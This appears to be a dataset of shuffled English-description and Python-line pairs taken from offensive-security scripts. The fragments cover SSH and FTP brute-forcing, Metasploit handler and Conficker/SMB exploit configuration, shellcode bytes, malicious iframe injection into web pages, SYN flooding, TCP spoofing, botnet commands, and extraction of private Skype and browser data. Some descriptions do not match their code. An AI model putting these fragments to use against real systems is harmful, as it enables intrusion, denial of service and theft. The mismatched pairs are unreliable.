Assign to pkts the result of the function rdpcap with argument 'fastFlux.pcap' pkts = rdpcap('fastFlux.pcap')
535 |
Call the method login with userName and passWord ftp.login(userName, passWord)
536 |
Call the function close of of with no argument f.close()
537 |
Continue the argument with '-u <wigle username> -p <wigle password>' '-u <wigle username> -p <wigle password>')
538 |
Call the function OpenKey with arguments key and the result of the function str with argument guid and assign it to netKey netKey = OpenKey(key, str(guid))
539 |
Assign to userName the value 'guest' userName = 'guest'
540 |
Add the option -u for user with type string and help as specify password file parser.add_option('-u', dest='user', type='string',help='specify the user')
541 |
For each password in the method readlines called with no arguments of pF for password in pF.readlines():
542 |
Start except block except:
543 |
Exit function with value True return True
544 |
Import the libraray for parsing import optparse
545 |
Import the library to manipulate Pdf files import pyPdf
546 |
Define the function handlePkt with argument pkt def handlePkt(pkt):
547 |
Call the method sendline with argument cmd on self.session self.session.sendline(cmd)
548 |
Assign to date the result of function str with argument row at position 1 date = str(row[1])
549 |
Call the method write of configFile with argument 'exploit -j -z\n' configFile.write('exploit -j -z\\n')
550 |
Assign to qname the value qname of the method getlayer with argument DNSQR of pkt qname = pkt.getlayer(DNSQR).qname
551 |
Assign to eth a ethernet connection with argument buf eth = dpkt.ethernet.Ethernet(buf)
552 |
Assign to url the string 'http://www.syngress.com/' url = 'http://www.syngress.com/'
553 |
"Assign to parser the OptionParser with argument the concatenation of""usage %prog "" and ""-p <iPhone Backup Directory> """ "parser = optparse.OptionParser(""usage %prog ""+""-p <iPhone Backup Directory> "")"
554 |
Return the value s return s
555 |
Connect to the database placesDB and assign it to conn conn = sqlite3.connect(placesDB)
556 |
If the value of Found is True if Found:
557 |
Assign to url the variable tgtURL of options url = options.tgtURL
558 |
Exit the function with value recycleDir return recycleDir
559 |
Join the paths of pathName and fileName and assign it to iphoneDB iphoneDB = os.path.join(pathName, fileName)
560 |
Exit the function with argument imgTags return imgTags
561 |
Call the object Browser with no argument from mechanize and assign it browser browser = mechanize.Browser()
562 |
Assign to c the cursor of conn c = conn.cursor()
563 |
Define the function main with no argument def main():
564 |
If ret is equal to 1 if ret == 1:
565 |
Call the member variable tgtHost of options and assign it to host host = options.tgtHost
566 |
Call the function connect with arguments host, user, password connect(host, user, password, False)
567 |
Add the options to parser '-p', dest equals to 'pcapFile', type equals to 'string', help equals to 'specify pcap filename' parser.add_option('-p', dest='pcapFile', type='string',help='specify pcap filename')
568 |
Connect to the database iphoneDB and assign it to conn conn = sqlite3.connect(iphoneDB)
569 |
Define the function printHistory with argument placesDB def printHistory(placesDB):
570 |
Call the function Open key with arguments HKEY_LOCAL_MACHINE key = OpenKey(HKEY_LOCAL_MACHINE,
571 |
Assign to Stop the value False Stop = False
572 |
define the method connect with argument self def connect(self):
573 |
"and ""\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a""" """\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"""
574 |
Assign an empty list to dirList dirList = []
575 |
Call the function open with arguments passwdFile and 'r' and assign it to pF pF = open(passwdFile, 'r')
576 |
Assign the value host to self.host self.host = host
577 |
Assign to response the result of the function open with argument the concatenation of 'http://ajax.googleapis.com/', 'ajax/services/search/web?v=1.0&q=' and search_term of ab response = ab.open('http://ajax.googleapis.com/'+ 'ajax/services/search/web?v=1.0&q='+ search_term)
578 |
Close the lock screenLock.close()
579 |
Call the function findImages with argument url and assign it to imgTags imgTags = findImages(url)
580 |
Define the function printMessage with argument msgDB def printMessage(msgDB):
581 |
Call the method add_option with arguments '-u', dest equals to 'tgtURL', type equals to 'string' and help= equals to 'specify target url' parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
582 |
Define the function plotIPs with argument pcap def plotIPs(pcap):
583 |
Receive the response in result results = connSkt.recv(100)
584 |
Increment the variable Fails of one Fails += 1
585 |
Define function setupHandler with arguments configFile, lhost and lport def setupHandler(configFile, lhost, lport):
586 |
Assign to exifGPS the value exifData sliced at 'GPSInfo' exifGPS = exifData['GPSInfo']
587 |
Assign userAgent to addheaders of browser browser.addheaders = userAgent
588 |
Increase addr with value '%02x ' module of the result of the function ord with argument ch addr += '%02x ' % ord(ch)
589 |
Assign to sport the sport of tcp sport = tcp.sport
590 |
Call the function exit with argument 0 of sys sys.exit(0)
591 |
Assign to connStr the value 'ssh ' concatenated to user connStr = 'ssh ' + user +\
592 |
Call the function EnumValue with argument netKey and 5 and assign the result to the tuple n, addr and t (n, addr, t) = EnumValue(netKey, 5)
593 |
Call the member variable passDir of options and assign it to passDir passDir = options.passDir
594 |
Define the function bruteLogin with arguments hostname nad passwdFile def bruteLogin(hostname, passwdFile):
595 |
Call the method expect on child with value a list composed of pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$' and '#' ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#',])
596 |
If fileName is equal to None if fileName == None:
597 |
Assign to lport the value of lport of options lport = options.lport
598 |
Open the filename with option 'wb' and assign it to save save = open(filename, 'wb')
599 |
"Use the command ""SELECT datetime(begin_timestamp,'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;""" "c.execute(""SELECT datetime(begin_timestamp,'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;"")"
600 |
Assign to host the value '' host = ''
601 |
Call the function printCookies with argument cookiesDB printCookies(cookiesDB)
602 |
"and ""\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30""" """\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"""
603 |
Assign to search the value r at the position 0 splitted at '&' at the position 0 search=r[0].split('&')[0]
604 |
Call the method split with argument ':' on line, take the the result in position 0 and assign it to userName userName = line.split(':')[0]
605 |
"Assign to net the value ""SOFTWARE\Microsoft\Windows NT\CurrentVersion"" and concatenate with next line" "net = ""SOFTWARE\Microsoft\Windows NT\CurrentVersion""+\"
606 |
Call the function nmapScan with arguments tgtHost and tgtPort nmapScan(tgtHost, tgtPort)
607 |
Continue the line with '@' concatenated to host concatenated to ' -i ' concatenated to keyfile concatenated to opt '@' + host + ' -i ' + keyfile + opt
608 |
Call the function printPcap with argument pcap printPcap(pcap)
609 |
If dport is equal to 80 if dport == 80:
610 |
Call the function urlopen with argument imgRead of urllib2 and call the method read with no arguments and assign it to imgContent imgContent = urllib2.urlopen(imgSrc).read()
611 |
Assign to exifData an empty dictionary exifData = {}
612 |
If downloadDB is a file if os.path.isfile(downloadDB):
613 |
Else if ret is more than 3 elif ret > 3:
614 |
If the src of options is equal to None if options.src == None:
615 |
Call the method release with no argument of connection_lock connection_lock.release()
616 |
If the iface of options is equal to None if options.iface == None:
617 |
Call method login with arguments host, user and password s.login(host, user, password)
618 |
Define the variable ssh_newkey and assign the value 'Are you sure you want to continue connecting' ssh_newkey = 'Are you sure you want to continue connecting'
619 |
Create a random source IP src = '.'.join([str(randint(1,254)) for x in range(4)])
620 |
Import the library to use regular expressions import re
621 |
Assign to lhost the value of lhost of options lhost = options.lhost
622 |
If lport is equal to None if lport == None:
623 |
If pktCount contains the key stream if pktCount.has_key(stream):
624 |
Start the try block try:
625 |
Call method sendline with argument password of child child.sendline(password)
626 |
Call the function connect with arguments host, user, password connect(host, user, password, False)
627 |
Define the function connect with arguments host, user, password and release def connect(host, user, password, release):
628 |
Start expect block except:
629 |
Define the function findImages with argument url def findImages(url):
630 |
Take the first argument of stream splitted at ':' and assign it to src src = stream.split(':')[0]
631 |
If keyword of options is equal to None if options.keyword == None:
632 |
If the function dnsQRTest returns True if dnsQRTest(pkt):
633 |
Start the expect block except:
634 |
Assign to results an empty list results = []
635 |
Call the method scan with arguments subnet and '445' of nmScan nmScan.scan(subNet, '445')
636 |
Assign to ab the class anonBrowser with no arguments ab = anonBrowser()
637 |
Start the finally block finally:
638 |
Create an empty dictionary and assign it to ttlValues ttlValues = {}
639 |
If host is equals to None or passDir is equals to None or User is equals to None if host == None or passDir == None or user == None:
640 |
Import the library to manage regular expression import re
641 |
For each imgTag in imgTags for imgTag in imgTags:
642 |
Define function portScan with parameters tgtHost and tgtPorts def portScan(tgtHost, tgtPorts):
643 |
Call the method expect with argument a list composed of the variable TIMEOUT from the library pexpect of child and assign the result to ret ret = child.expect([pexpect.TIMEOUT, \
644 |
Define the function retKML with argument ip def retKML(ip):
645 |
Execute the command 'SELECT host, name, value FROM moz_cookies'on c c.execute('SELECT host, name, value FROM moz_cookies')
646 |
Call the function quit with no argument from the library ftp ftp.quit()
647 |
Add the option -F for passwdFile with type string and help as specify password file parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
648 |
Assign to seqNum the seq of the method getlayer with argument TCP of ans seqNum = ans.getlayer(TCP).seq
649 |
Call the function sleep with argument 1 of the package time time.sleep(1)
650 |
Assign an empty list to botNet botNet = []
651 |
Increment of one the pktCount at the key stream pktCount[stream] = pktCount[stream] + 1
652 |
"and ""\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25""" """\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"""
653 |
Call the method open with argument imgFileName of Image and assign the result to imgFile imgFile = Image.open(imgFileName)
654 |
Call the function FTP with argument host and assign it to ftp ftp = ftplib.FTP(host)
655 |
"and ""\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41""" """\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"""
656 |
if pathName is equal to None if pathName == None:
657 |
If info exists if info:
658 |
Assign to ssh_newkey the value 'Are you sure you want to continue' ssh_newkey = 'Are you sure you want to continue'
659 |
Assign to TCPlayer the result of the function TCP with argument sport equals to 513, dport equals to 514 and ack equals to ack TCPlayer = TCP(sport=513, dport=514, ack=ack)
660 |
Import the library to localize an IP import pygeoip
661 |
Import the library to localize IPs import pygeoip
662 |
Call the function urlencode with argument params from the library urllib and assign it reqParams reqParams = urllib.urlencode(params)
663 |
From the library to manipulate paths of os import the function basename from os.path import basename
664 |
Download the image imgTag and assign it to imgFileName imgFileName = downloadImage(imgTag)
665 |
Call the function sid2user with argument sid and assign it to user user = sid2user(sid)
666 |
Define the variable maxConnections and assign the value 5 maxConnections = 5
667 |
Create the constant THRESH and assign it to 5 THRESH = 5
668 |
Call the method write of configFile with argument 'set LHOST' concatenated to the function str with argument lhost concatenated to '\n' configFile.write('set LHOST ' + lhost + '\\n')
669 |
Import everything from the library for estabilish a connection from socket import *
670 |
Assign to lport the value '1337' lport = '1337'
671 |
Call the function sleep with argument 5 of the package time time.sleep(5)
672 |
For each row in c for row in c:
673 |
Assign to placesDB the path of 'places.sqlite' joined with pathName placesDB = os.path.join(pathName, 'places.sqlite')
674 |
Assign to fileName the variable fileName of options fileName = options.fileName
675 |
Call method sendline with argument cmd of child child.sendline(cmd)
676 |
Else else:
677 |
Assign to kmlfooter the string '</Document>\n</kml>\n' kmlfooter = '</Document>\\n</kml>\\n'
678 |
Assign to filename the result of the method lstrip with argument 'http://' of image with key 'src' filename = image['src'].lstrip('http://')
679 |
Call the function ddosTest with arguments src, dst, iface and count ddosTest(src, dst, iface, count)
680 |
Define the function findDownload with argument pcap def findDownload(pcap):
681 |
Call the method findAll with argument 'img' imgTags = soup.findAll('img')
682 |
Call the method open with argument url of ab and assign it to html html = ab.open(url)
683 |
If the substring '.zip' is in uri and the substring 'loic' is in uri if '.zip' in uri and 'loic' in uri:
684 |
For each tag and value in the method items with no arguments of info for (tag, value) in info.items():
685 |
Import the library for parsing data import optparse
686 |
Import the library to create a network socket import socket
687 |
For each i in the result of the function range with argument 100 for i in range(100):
688 |
Call the function returnDir with no arguments and assign the result to recycledDir recycledDir = returnDir()
689 |
Call the method write of configFile with argument 'set LPORT ' concatenated to the function str with argument lport concatenated to '\n' configFile.write('set LPORT ' + str(lport) + '\\n')
690 |
Assign to conn_closed the value 'Connection closed by remote host' conn_closed = 'Connection closed by remote host'
691 |
Define the function google with argument search_term def google(search_term):
692 |
Assign to ab the class anonBrowser with no argument ab = anonBrowser()
693 |
Import the library to manage socket import socket
694 |
Assign to count the count of options count = options.count
695 |
Call the function QueryValueEx with arguments key and 'ProfileImagePath' and assign it to the tuple value and type (value, type) = QueryValueEx(key, 'ProfileImagePath')
696 |
Call function exit with argument 0 exit(0)
697 |
"Create a packet pkt with source src, destination dst, UDP with destination port equals to 518 and the load equals to ""\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8""" "pkt = IP(src=src, dst=dst) / UDP(dport=518) /Raw(load=""\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8"")"
698 |
Exit function return
699 |
Start finally block finally:
700 |
Call the function testForExif with argument imgFileName testForExif(imgFileName)
701 |
Create a parser with OptionParser 'usage %prog -i <interface> -t <thresh>' "parser = optparse.OptionParser(""usage %prog ""+""-i <interface> -t <thresh>"")"
702 |
Assign 0 to diffSeq diffSeq = 0
703 |
For each pkt in pkts for pkt in pkts:
704 |
Call the function botnetCommand with argument 'uname -v' botnetCommand('uname -v')
705 |
Define the variable host and assign the value '' host = ''
706 |
Calculate the state as the as the tgthost with protocol tcp on the port tgtPort with state field state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
707 |
Call the function retKML with argument dst and assign it to dstKML dstKML = retKML(dst)
708 |
"and ""\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f""" """\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"""
709 |
"and ""\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b""" """\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"""
710 |
Connect to the database downloadDB and assign it to conn conn = sqlite3.connect(downloadDB)
711 |
Exit the function with the tuple None and None return (None, None)
712 |
Assign to the variable maxConnections the value 5 maxConnections = 5
713 |
Call function main with no arguments main()
714 |
"Continue and concatenate with argument ""-F <PDF file name>'" """-F <PDF file name>')"
715 |
Do nothing pass
716 |
Create a parser with OptionParser 'usage %prog -p <pcap file>' parser = optparse.OptionParser('usage %prog -p <pcap file>')
717 |
Assign to the tuple options and args the result of the function parse_args with no argument of parser (options, args) = parser.parse_args()
718 |
Exit the function return
719 |
Concatenate the strings city, ',' and country to geoLoc geoLoc = city + ', ' + country
720 |
Assign to count the value 1 count = 1
721 |
If the method of http is equal to 'GET' if http.method == 'GET':
722 |
"and ""\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf""" """\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"""
723 |
Assign to rcode the value rcode of the method getlayer with argument DNS of pkt rcode = pkt.getlayer(DNS).rcode
724 |
Define function send_command with arguments self and cmd def send_command(self, cmd):
725 |
Call the open function with arguments page concatenated to '.tmp' and 'w' f = open(page + '.tmp', 'w')
726 |
"and ""\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea""" """\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"""
727 |
Wait 1 second time.sleep(1)
728 |
Assign to synPkt the IPlayer divided by the TCPlayer synPkt = IPlayer / TCPlayer
729 |
Import the library to manages json files import json
730 |
Call the function findall with arguments r'maplat=.*\&' and resp from re and assign it to rLon rLon = re.findall(r'maplon=.*\&', resp)
731 |
For each stream in pktCount for stream in pktCount:
732 |
Call the method append on botNet with argument client botNet.append(client)
733 |
Call the function spoofConn with arguments srcSpoof, tgt and seqNum spoofConn(srcSpoof, tgt, seqNum)
734 |
Import the library to manage urls import urllib2
735 |
Add the option of the parser p for passDir as a string with help specify directory wtih keys parser.add_option('-d', dest='passDir', type='string',help='specify directory with keys')
736 |
Return the variable kml return kml
737 |
Import the library to parse text import optparse
738 |
Define smbBrute with arguments configFile, tgtHost, passwdFile, lhost and lport def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
739 |
Call the function handlePkt with argument pkt handlePkt(pkt)
740 |
Call the function send_command with argument command and assign the value to output output = client.send_command(command)
741 |
Call the exit function with argument 0 exit(0)
742 |
Define the function findTgts with argument subNet def findTgts(subNet):
743 |
Assign to search_term the result of the function quote_pulse with argument search_term of urllib search_term = urllib.quote_plus(search_term)
744 |
From the library to parse urls import urlsplit from urlparse import urlsplit
745 |
If placesDB is a file if os.path.isfile(placesDB):
746 |
Return the object child return child
747 |
Call the method parse_args with no arguments of parser and assign the result to the tuple made of options and args (options, args) = parser.parse_args()
748 |
Call the method getDocumentInfo with no argument and assign it to docInfo docInfo = pdfFile.getDocumentInfo()
749 |
Assign to results the result of the function google with argument keyword results = google(keyword)
750 |
"Use the command ""SELECT fullname, skypename, city, country, datetime(profile_timestamp,'unixepoch') FROM Accounts;"" on c" "c.execute(""SELECT fullname, skypename, city, country, datetime(profile_timestamp,'unixepoch') FROM Accounts;"")"
751 |
Call the method write of configFile with argument 'use exploit/multi/handler\n' configFile.write('use exploit/multi/handler\\n')
752 |
For each fileName in dirList for fileName in dirList:
753 |
Define the method __init__ with arguments self, title, text and url def __init__(self,title,text,url):
754 |
Call the function testUserAgent with argument url and userAgent testUserAgent(url, userAgent)
755 |
Append to the list dnsRecords at the key rrname the value rdata dnsRecords[rrname].append(rdata)
756 |
Call the exit function with argument 0 exit(0)
757 |
Divide IPlayer by TCPlayer and assign it to pkt pkt = IPlayer / TCPlayer
758 |
Define the function testProxy with argument url and proxy def testProxy(url, proxy):
759 |
Define the function returnDir with no arguments def returnDir():
760 |
Assign to city the field 'city' city = rec['city']
761 |
Define the function injectPage with arguments ftp, page and redirect def injectPage(ftp, page, redirect):
762 |
Create the tuple kml with arguments '<Placemark>\n', '<name>%s</name>\n', '<Point>\n', '<coordinates>%6f, %6f</coordinates>\n', '</Point>\n' and '</Placemark>\n') kml = ( '<Placemark>\\n', '<name>%s</name>\\n', '<Point>\\n', '<coordinates>%6f, %6f</coordinates>\\n', '</Point>\\n','</Placemark>\\n')
763 |
Define the function explitTest with arguments src, dst, iface and count def exploitTest(src, dst, iface, count):
764 |
Import the library to parse string import optparse
765 |
Call the method write of configFile with argument 'set LPORT ' concatenated to the function str with argument lport concatenated to '\n' configFile.write('set LPORT ' + str(lport) + '\\n')
766 |
Define confickerExploit with arguments configFile, tgtHost, lhost and lport def confickerExploit(configFile,tgtHost,lhost,lport):
767 |
Call the function checkTTL with arguments ipsrc and ttl checkTTL(ipsrc, ttl)
768 |
For each ts and buf in pcap for (ts, buf) in pcap:
769 |
Call the method write of configFile with argument 'set SMBPass' concatenated to the function str with argument password concatenated to '\n' configFile.write('set SMBPass ' + str(password) + '\\n')
770 |
Start expect block with Exception and e except Exception, e:
771 |
Start the expect block except:
772 |
Assign to ret the object pack with arguments '<L' and 0x7C874413 of struct ret = struct.pack('<L', 0x7C874413)
773 |
Call the function mirrorImages with arguments url and dir mirrorImages(url, dir)
774 |
Assign to the variable user the value 'root' user = 'root'
775 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' and '-u <target url>' of optparse parser = optparse.OptionParser('usage %prog ' +'-u <target url>')
776 |
Define the function printCookies with argument url def printCookies(url):
777 |
"Continue the concatenation with '""http:\\\\\\exploit""></iframe>'" "'""http:\\\\\\exploit""></iframe>'"
778 |
For each fileName in dirList for fileName in dirList:
779 |
Assign to addr the result of the function str with argument row at the position 1 addr = str(row[1])
780 |
Assign an empty list to retList retList = []
781 |
Add the option to the parser '-p', dest equals to 'pathName', type equals to 'string' and help equals to 'specify skype profile path' parser.add_option('-p', dest='pathName', type='string',help='specify skype profile path')
782 |
Call the function synFlood with arguments synSpoof and srcSpoof synFlood(synSpoof, srcSpoof)
783 |
Send the packet to iface and count equals count send(pkt, iface=iface, count=count)
784 |
define the constructor with arguments self, host and password def __init__(self, host, user, password):
785 |
Call function setdefaulttimeout with parameter 1 setdefaulttimeout(1)
786 |
Do nothing pass
787 |
Assign to pcap the result of the Reader function with argument f of pcap of dpkt pcap = dpkt.pcap.Reader(f)
788 |
Assign to imgSrc the value imgTag sliced at 'src' imgSrc = imgTag['src']
789 |
If rcode is equal to 3 if rcode == 3:
790 |
Assign to cookiesDB the path of 'cookies.sqlite' joined with pathName cookiesDB = os.path.join(pathName, 'cookies.sqlite')
791 |
Exit function with argument 'Unregistered' return 'Unregistered'
792 |
"and ""\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82""" """\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"""
793 |
Change the scope of the variable Stop to global global Stop
794 |
Call the method login with arguments host, user and password of s s.login(host, user, password)
795 |
Call the function Thread with arguments connScan assigned to target and args equals to the tuple tgtHost and the function int with argument tgtPort and assign the result to t t = Thread(target=connScan,args=(tgtHost,int(tgtPort)))
796 |
Assign the value '<iframe src=' concatenated with the next line to redirect redirect = '<iframe src='+\
797 |
Call the method close with no arguments of imgFile imgFile.close()
798 |
Do nothing pass
799 |
Assign to response the result of the method open with argument the concatenation of 'http://ajax.googleapis.com/', 'ajax/services/search/web?v=1.0&q=' and search_term of ab response = ab.open('http://ajax.googleapis.com/'+ 'ajax/services/search/web?v=1.0&q='+ search_term)
800 |
Call the function system with argument 'msfconsole -r meta.rc' from the library os os.system('msfconsole -r meta.rc')
801 |
Call the method prompt on self.session with no arguments self.session.prompt()
802 |
Exit function with argument 0 exit(0)
803 |
Assign to unAnsReqs the value 0 unAnsReqs = 0
804 |
Define the function retGeoStr with argument ip def printPcap(pcap):
805 |
Call the function exploitTest with arguments src, dst, iface and count exploitTest(src, dst, iface, count)
806 |
Call the method write of configFile with argument 'set SMBUser' concatenated to the function str with argument username concatenated to '\n' configFile.write('set SMBUser ' + str(username) + '\\n')
807 |
Assign the object FTP from ftplib with argument host and assign it to ftp ftp = ftplib.FTP(host)
808 |
Exit function with argument None return None
809 |
Add the option -H for tgtHost with type string and help as specify target host parser.add_option('-H', dest='tgtHost', type='string',help='specify target host')
810 |
From the library to manipulate images import Image from PIL import Image
811 |
Assign to the tuple options and args the result of the method parse_args with no argument of parser (options, args) = parser.parse_args()
812 |
If Fails is more than five if Fails > 5:
813 |
Call the method open with arguments respURL and reqParams of browser then call the method read with no argument and assign it to resp resp = browser.open(respURL, reqParams).read()
814 |
Assign the result of the method connect with no argument to self.session self.session = self.connect()
815 |
"and ""\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53""" """\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"""
816 |
Call the function setupHandler with argument configFile, lhost and lport setupHandler(configFile, lhost, lport)
817 |
Define the function viewPage with argument url def viewPage(url):
818 |
Exit function returning retList return retList
819 |
Assign to url the string 'http://whatismyuseragent.dotdoh.com/' url = 'http://whatismyuseragent.dotdoh.com/'
820 |
Call the method write with argument data of save save.write(data)
821 |
Call the class Thread with argument target equals to connect and assign it to t t = Thread(target=connect,\
822 |
Start expect block except:
823 |
Exit the function with sid value return sid
824 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' and '-u <target url> -d <destination directory>' of optparse parser = optparse.OptionParser('usage %prog '+ '-u <target url> -d <destination directory>')
825 |
Import the library to parse data import optparse
826 |
Call the method parse_args with no arguments and assign it to the tuple options and args (options, args) = parser.parse_args()
827 |
Execute the command 'SELECT name, source, datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;' on c c.execute('SELECT name, source, datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;')
828 |
Start block finally finally:
829 |
Assign to keyword the variable keyword of options keyword = options.keyword
830 |
Call the function open with arguments passwdFile and 'r' and assign it to fn fn = open(passwdFile, 'r')
831 |
Define the function printRecord with argument tgt def printRecord(tgt):
832 |
Assign to msgDirection the concatenation of To, the function str with argument row at position 1 and : msgDirection = 'To ' + str(row[1]) + ': '
833 |
Call the function val2addr with argument addr and assign it to macAddr macAddr = val2addr(addr)
834 |
Assign to the variable connStr the concatenation of 'ssh ', user, '@' and host connStr = 'ssh ' + user + '@' + host
835 |
Exit function returning value s return s
836 |
Assign to url the result of function str with argument row at position 0 url = str(row[0])
837 |
If the substring google is the url in lower case if 'google' in url.lower():
838 |
If city is not equal to an empty string if city != '':
839 |
Assign to object the result of the method load with argument response of json objects = json.load(response)
840 |
if the function str with argument row at position 1 is not equal to function str with argument row at position 2 if str(row[1]) != str(row[2]):
841 |
"Parse the information 'usage %prog ""and ""target url'" "parser = optparse.OptionParser('usage %prog ""+""-u <target url>')"
842 |
Assign to tgt the IP '' tgt = ''
843 |
Assign an empty list to tgtHosts tgtHosts = []
844 |
Assign to iface of conf the string 'eth0' conf.iface = 'eth0'
845 |
Call the method write of configFile with argument 'set RHOST' concatenated to the function str with argument password concatenated to '\n' configFile.write('set RHOST ' + str(tgtHost) + '\\n')
846 |
Call the method expect with argument a list composed of the variable TIMEOUT from the library pexpect, ssh_newkey and the string [P|p]assword: of child and assign the result to ret ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:'])
847 |
If there are no url if url == None:
848 |
Assign to the variable username the value 'Administrator' username = 'Administrator'
849 |
Assign to response the result of the function open with argument the concatenation of 'http://ajax.googleapis.com/', 'ajax/services/search/web?v=1.0&q=' and search_term of ab response = ab.open('http://ajax.googleapis.com/'+ 'ajax/services/search/web?v=1.0&q='+ search_term)
850 |
Create a packet pkt with source src, destination dst, UDP with destination port equals to 10080 and the load equals to 'Amanda' pkt = IP(src=src, dst=dst) / UDP(dport=10080) /Raw(load='Amanda')
851 |
Create a packet pkt with source src, destination dst, ICMP type 8 and id equals to 678 and the load equals to '1234' pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234')
852 |
Request the data with a tcp connection and assign it to http http = dpkt.http.Request(tcp.data)
853 |
Call the function GeoIP with argument '/opt/GeoIP/Geo.dat' and assign it to gi gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')
854 |
"Use the command ""SELECT displayname, skypename, city, country,phone_mobile, birthday FROM Contacts;"" on c" "c.execute(""SELECT displayname, skypename, city, country,phone_mobile, birthday FROM Contacts;"")"
855 |
Define the function send_command with arguments s and cmd def send_command(s, cmd):
856 |
Call the method add_option with arguments '-u' dest equals to 'username' and type equals to 'string', parser.add_option('-p', dest='password', type='string',
857 |
Call the method write with argument redirect of f f.write(redirect)
858 |
Return the sum of seqNum with diffSeq return seqNum + diffSeq
859 |
Assign to target the value argv at position 1 of sys target = sys.argv[1]
860 |
Call the method write of configFile with argument 'set LHOST ' concatenated to lhost concatenated to '\n' configFile.write('set LHOST ' + lhost + '\\n')
861 |
For each row in c for row in c:
862 |
If rdata is not in the lust dnsRecords with key rrname if rdata not in dnsRecords[rrname]:
863 |
Parse the usage usage %prog, the target host, the user and the password list parser = optparse.OptionParser('usage %prog '+'-H <target host> -u <user> -F <password list>')
864 |
Call the function OpenKey with arguments HKEY_LOCAL_MACHINE and net and assign it to key key = OpenKey(HKEY_LOCAL_MACHINE, net)
865 |
Add the options to parser '-p', dest equalsto 'pcapFile', type equals to 'string', help equals to 'specify pcap filename' parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
866 |
From the library to get random values import randint from random import randint
867 |
Assign to passwdFile the value 'userpass.txt' passwdFile = 'userpass.txt'
868 |
Start except block with Exception and e except Exception, e:
869 |
Assign to rrname the rrname of the method getlayer with argument DNSRR of ptk rrname = pkt.getlayer(DNSRR).rrname
870 |
Call the method write of configFile with argument 'set LHOST ' concatenated to lhost concatenated to '\n' configFile.write('set LHOST ' + lhost + '\\n')
871 |
Assign to dst the ip destination of ip.dst dst = socket.inet_ntoa(ip.dst)
872 |
Create a packet pkt with source src, destination dst, ICMP type 0 and the load equals to 'AAAAAAAAAA' pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='AAAAAAAAAA')
873 |
Assign to params the dictionary empty params = {}
874 |
For each tuple made of ts and buf of pcap for (ts, buf) in pcap:
875 |
If the method haslayer with argument DNSRR of pkt returns True and sport of the method getlayer with argument UPT of pkt is equals to 53 if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
876 |
Assign the value 'guest' to passWord passWord = 'guest'
877 |
Call the function findAttack of pcap findAttack(pcap)
878 |
Call the function findDownload of pcap findDownload(pcap)
879 |
Define the function ddosTest with arguments src, dst, iface and count def ddosTest(src, dst, iface, count):
880 |
Call the function basename with argument urlsplit with argument imgSrc sliced at position 2 and assing it to imgFileName imgFileName = basename(urlsplit(imgSrc)[2])
881 |
Start except block with Exception e except Exception, e:
882 |
Import the library to connect to database import sqlite3
883 |
Connect to the database msgDB and assign it to conn conn = sqlite3.connect(msgDB)
884 |
Assign to browser the default browser of Browser browser = mechanize.Browser()
885 |
If r exists if r:
886 |
If ret equals 2 if ret == 2:
887 |
Assign the variable passwdFile of options to passwdFile passwdFile = options.passwdFile
888 |
If url is equal to None or if dir is equal to None if url == None or dir == None:
889 |
Define the function sid2user with argument sid def sid2user(sid):
890 |
Call the function login with arguments 'anonymous' and '[email protected]' from library ftp ftp.login('anonymous', '[email protected]')
891 |
Assign to cookie_jar the LWPCookieJar with no argument of cookielib cookie_jar = cookielib.LWPCookieJar()
892 |
Load the json of response and assign it to object objects = json.load(response)
893 |
Start except block with Exception e except Exception, e:
894 |
Define the function downloadImage with argument imgTag def downloadImage(imgTag):
895 |
Call the function printMeta with argument fileName printMeta(fileName)
896 |
